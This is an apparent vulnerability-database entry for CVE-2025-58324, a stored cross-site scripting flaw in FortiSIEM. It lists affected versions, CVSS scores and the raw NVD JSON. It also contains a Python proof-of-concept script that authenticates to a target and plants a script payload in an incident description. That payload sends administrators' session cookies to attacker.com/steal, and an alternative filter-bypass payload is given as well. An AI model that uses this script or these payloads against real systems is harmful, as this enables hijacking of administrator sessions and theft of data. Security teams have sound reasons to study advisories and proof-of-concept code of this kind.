Security Vulnerability Report
CVE-2025-58324 CVSS 6.4 MEDIUM

CVE-2025-58324

Published: 2025-10-14 16:15:41
Last Modified: 2025-10-14 20:25:09

Description

An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiSIEM 7.2.0 through 7.2.2, 7.1 all versions, 7.0 all versions, 6.7 all versions, 6.6 all versions, 6.5 all versions, 6.4 all versions, 6.3 all versions, 6.2 all versions may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP requests.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* - VULNERABLE
FortiSIEM 7.2.0
FortiSIEM 7.2.1
FortiSIEM 7.2.2
FortiSIEM 7.1 (all versions)
FortiSIEM 7.0 (all versions)
FortiSIEM 6.7 (all versions)
FortiSIEM 6.6 (all versions)
FortiSIEM 6.5 (all versions)
FortiSIEM 6.4 (all versions)
FortiSIEM 6.3 (all versions)
FortiSIEM 6.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58324 - FortiSIEM Stored XSS PoC
# This PoC demonstrates a stored XSS attack via crafted HTTP requests
# Target: FortiSIEM 7.2.0 - 7.2.2, 7.1.x, 7.0.x, 6.x all versions

import requests

# Configuration
TARGET_URL = "https://fortisiem-target.example.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to FortiSIEM
session = requests.Session()
login_url = f"{TARGET_URL}/phoenix/login"

# Get login page to retrieve CSRF token
response = session.get(login_url)

# Perform login (adjust parameters based on FortiSIEM version)
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "csrfmiddlewaretoken": session.cookies.get("csrftoken", "")
}
response = session.post(login_url, data=login_data, verify=False)

# Step 2: Inject malicious XSS payload via a stored field
# Common injection points: incident description, report name, dashboard widget, rule description
xss_payload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>'

# Example: Inject via incident/comment creation
inject_url = f"{TARGET_URL}/phoenix/rest/event/incident/create"
inject_data = {
    "incidentTitle": "Security Alert",
    "incidentDescription": f"Normal alert description {xss_payload}",
    "severity": "3",
    "csrfmiddlewaretoken": session.cookies.get("csrftoken", "")
}
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"{TARGET_URL}/phoenix/"
}
response = session.post(inject_url, data=inject_data, headers=headers, verify=False)

print(f"Injection Status: {response.status_code}")
print(f"Payload stored: {xss_payload}")

# Step 3: When an admin views the incident, the XSS executes
# The malicious script steals the admin's session cookie
# and redirects to the attacker's controlled server
print("\n[!] XSS payload stored successfully.")
print("[!] When a high-privilege user views this content, the payload will execute.")
print("[!] Captured data will be sent to: https://attacker.com/steal")

# Alternative payload using event handlers (bypasses some filters)
alternative_payload = '"><img src=x onerror=alert(document.domain)>'
print(f"\nAlternative payload: {alternative_payload}")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-280 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58324",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T16:15:40.607",
    "lastModified": "2025-10-14T20:25:09.460",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiSIEM 7.2.0 through 7.2.2, 7.1 all versions, 7.0 all versions, 6.7 all versions, 6.6 all versions, 6.5 all versions, 6.4 all versions, 6.3 all versions, 6.2 all versions may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.5,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.2.0",
                "versionEndExcluding": "7.2.3",
                "matchCriteriaId": "5619BB86-43BB-45D5-B197-ABA3C1E2EAEB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-280",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```